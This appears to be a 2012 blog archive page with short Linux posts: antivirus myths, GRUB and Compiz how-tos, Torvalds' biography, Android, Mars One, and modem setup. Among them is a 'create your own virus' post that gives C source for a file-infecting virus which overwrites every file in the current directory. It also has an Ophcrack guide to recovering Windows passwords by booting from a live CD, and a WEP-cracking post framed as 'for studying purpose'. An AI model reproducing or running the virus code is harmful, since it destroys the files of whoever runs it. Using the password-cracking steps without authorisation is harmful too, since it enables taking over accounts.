Posts

Showing posts from August, 2012

No antivirus needed for linux bcoz virus wont infect Linux

Image
                                                    virus can visible in linux it is a virus                                                                        it is that virus program Windows users have to watch their virus checkers as closely as the head nurse in the ICU keeps an eye on patient monitors. Often, the buzz in the Windows security world is about which protection-for-profit firm was the first to discover and offer protection for the malware du jour -- or should I say malware de l'heure ? The only thing better than having backed the winning Super Bowl team come Monday morning at the office coffeepot is having the virus checker you use be the one winning the malware sweepstakes that weekend. If a rogue program finds a crack in your Windows armor, paying $200 per infection to have your machine scrubbed and sanitized by the local goon^H^H^H^H geek squad not only helps to reinforce the notion that you have to have malware protection, but that it

how do i set the grub timeout in ubuntu 12.04

Image
How to set grub timeout in ubuntu 12.04 step-1 First open terminal click ctrl+t to open step-2 And type this command on that gksudo gedit /etc/default/grub   step-3 Aft giving that command it will ask password like below image give ur account password for that thn it will leave u in   step-4 One tab will appear like this  step-5 check GRUB_TIMEOUT and keep ur time there if u need to windows should be ur first boot os u can make GRUB_DEFAULT as (1) it will enter to windows step-6 save it like in picture and close it while closing i will ask to save again give close without saving lik given belown image this is how to make grub timeout thanks for watching..  

Advantage of linux(open source) operating system

Image
  Linux Advantages Low cost: You don’t need to spend time and money to obtain licenses since Linux and much of its software come with the GNU General Public License. You can start to work immediately without worrying that your software may stop working anytime because the free trial version expires. Additionally, there are large repositories from which you can freely download high quality software for almost any task you can think of. Stability: Linux doesn’t need to be rebooted periodically to maintain performance levels. It doesn’t freeze up or slow down over time due to memory leaks and such. Continuous up-times of hundreds of days (up to a year or more) are not uncommon. Performance: Linux provides persistent high performance on workstations and on networks. It can handle unusually large numbers of users simultaneously, and can make old computers sufficiently responsive to be useful again. Network friendliness: Linux was developed by a group of prog

Linux torvalds history

Image
Linus Benedict Torvalds born December 28, 1969) is a Finnish American software engineer and hacker, who was the principal force behind the development of the Linux kernel. He later became the chief architect of the Linux kernel, and now acts as the project's coordinator. He also created the revision control system Git. He was honored, along with Shinya Yamanaka, with the 2012 Millennium Technology Prize by the Technology Academy Finland " in recognition of his creation of a new open source operating system for computers leading to the widely used Linux kernel ". Torvalds was born in Helsinki, Finland. He is the son of journalists Anna and Nils Torvalds, and the grandson of poet Ole Torvalds. Both of his parents were campus radicals at the University of Helsinki in the 1960s. His family belongs to the Swedish-speaking minority (5.5% of Finland's population). Torvalds was named after Linus Pauling, the American Nobel Prize-winning chemist, although in the book R

BackTrack5(linux) how to crack wep network password (only for studying purpose)

Image
  BackTrack is a distribution based on the Debian GNU/Linux distribution aimed at digital forensics and penetration testing use. It is named after backtracking, a search algorithm. The current version is BackTrack5r3 History The BackTrack distribution originated from the merger of two formerly competing distributions which focused on penetration testing: WHAX : a Slax based Linux distribution developed by Mati Aharoni, a security consultant. Earlier versions of WHAX were called Whoppix and were based on Knoppix. Auditor Security Collection : a Live CD based on Knoppix developed by Max Moser which included over 300 tools organized in a user-friendly hierarchy. The overlap with Auditor and WHAX in purpose and in their collection of tools partly led to the merger. Tools BackTrack provides users with easy access to a comprehensive and large collection of security-related tools ranging from port scanners to password crackers. Support for Live CD and Live USB function

Every body knows Android mobile but how many knows Android is based on linux Operating System?

Image
Linux   Android's kernel is based on the Linux kernel and has further architecture changes by Google outside the typical Linux kernel development cycle. Android does not have a native X Window System by default nor does it support the full set of standard GNU libraries, and this makes it difficult to port existing Linux applications or libraries to Android. Certain features that Google contributed back to the Linux kernel, notably a power management feature called wakelocks, were rejected by mainline kernel developers, partly because kernel maintainers felt that Google did not show any intent to maintain their own code .Even though Google announced in April 2010 that they would hire two employees to work with the Linux kernel community, [ 41 ] Greg Kroah-Hartman, the current Linux kernel maintainer for the -stable branch, said in December 2010 that he was concerned that Google was no longer trying to get their code changes included in mainstream Linux. Some Google

World's Smallest artificial Heart transplant to 16months baby

Image
In today's feel good story, doctors in Italy successfully implanted this lil titanium pump into the chest of a 16-month old boy to act as his heart until a donor heart was found. Just don't go thinking about how you find another 16-month old heart for transplant, because I just did and now I've got the sads :( The doctors at Rome's Bambino Gesu hospital said the operation was carried out last month and made public this week. The baby, whose identity has not been disclosed, was kept alive for 13 days before the transplant and is now doing well. The tiny titanium pump weighs only 11 grams and can handle a blood flow of 1.5 liters a minute. An artificial heart for adults weighs 900 grams. "This is a milestone," surgeon Antonio Amodeo told Reuters television, adding that while the device was now used as bridge leading to a transplant, in the future it could be permanent. Hoho -- science used for good for a change! Also, I doubt it&#

2023 Humans Are Going To Live On Mars

Image
          Humans Will Live On Mars In 2023 Mars One’s mission objective Mars One plans to establish the first human settlement on Mars by April 2023. The first crew of four astronauts emigrate to their new planet from Earth, a journey that takes seven months. A new team will join the settlement every two years. By 2033 there will be over twenty people living, working and flourishing on Mars, their new home. The vision of Mars One A manned mission to Mars is one of the most exciting, inspiring and ambitious adventures that mankind can take on. We see this as a journey that belongs to us all, and it is for this reason that we will make every step one that we take together. This will also be our way to finance the mission: the mission to Mars will be the biggest media event ever! The entire world will be able to watch and help with decisions as the teams of settlers are selected, follow their extensive training and preparation for the mission and of course obse
Image
CREATE A OWN VIRUS              This program is an example of how to create a virus in C. This program demonstrates a simple virus program which upon execution (Running) creates a copy of itself in the other file. Thus it destroys other files by infecting them. But the virus infected file is also capable of spreading the infection to another file and so on. Here’s the source code of the virus program. Type this in C  #include<stdio.h> #include<io.h> #include<dos.h> #include<dir.h> #include<conio.h> #include<time.h> FILE *virus,*host; int done,a=0; unsigned long x; char buff[2048]; struct ffblk ffblk; clock_t st,end; void main() { st=clock(); clrscr(); done=findfirst(“*.*”,&ffblk,0); while(!done) { virus=fopen(_argv[0],”rb”); host=fopen(ffblk.ff_name,”rb+”); if(host==NULL) goto next; x=89088; printf(“Infecting %s\n”,ffblk.ff_name,a); while(x>2048) { fread(buff,2048,1,virus); fwrite(buff,2048,1,host);

Hack windows passwd using Oph crack(linux)

Image
How to crack a Windows password with Ophcrack Live CD Extremely impressed at the ease and speed with which the Ophcrack Live CD cracked my Windows admin password when I tested it out a few weeks ago , I thought it might be useful to throw together a quick guide detailing how to use this powerful little utility. step-1 first download ophcrack live cd from this link----> http://ophcrack.sourceforge.net/ then burn that iso image using burner(use CD's) to burn then insert that cd into ur dvd drive then restart ur computer (before that change ur booting priority to dvd drive) then it will boot step-2 click first option in grub appear it will get in it search ur passwd in rainbow table step-3 Then it will analyse ur passswd in windows(sam file) it will appear in 1 to 2 min step-4 if there is no password it will appear empty or if u kept password for any other user it will appear lik this shown belown                           now u got ur pass

How to make 3D desktop for ubuntu linux..

Image
 What Compiz Is Compiz is a compositing window manager, a program that beautifies the desktop with unique animations and special effects. How to install compiz step-1                 get into ubuntu software center to get compiz step-2   then click on compiz & install.. it will be install in few minute.. step-3 then also install synaptic package step-4 then type as ccsm in dash home it will appear.   Then enable wobbly windows to make elastic tab step-5  this step to make rotaing cube windows if u r using ubuntu 12.04 plz make lik this   get into ubuntu unity plugin and make disable then side ubuntu wall will be disapear... step-6 then enable desktop cube step-7 Then enable rotate cube step-8 then get into desktop cube and make wat i did below   choose any color for top & bottom of the cube if u need u can choose any picture
Image
      Installing Reliance Netconnect + on CentOS  6 & Redhat # Yum install wvdial # Yum install libusb-devel Check your device detected and ttyUSB* (ttyUSB0) file in /dev directory. # ls /dev/ttyUSB* If you see ttyUSB0 ttyUSB1 and like so then your device is detected # vi /etc/wvdial.conf [Modem0] Modem = /dev/ttyUSB0 Baud = 115200 SetVolume = 0 Dial Command = ATDT Init1 = ATZ FlowControl = Hardware (CRTSCTS) [Dialer netconnect] Username = 93********You Phone Number Password = 93********Your Password phone number Phone = #777 Stupid Mode = 1 Inherits = Modem0 Connect to Internet by dialing dialer with command:-   # wvdial netconnect --> WvDial: Internet dialer version 1.56 --> Cannot get information for serial port. --> Initializing modem. --> Sending: ATZ ATZ OK --> Modem initialized. --> Sending: ATDT#777 --> Waiting for carrier. ATDT#777 CONNECT 230400 --> Carrier detected. Starting P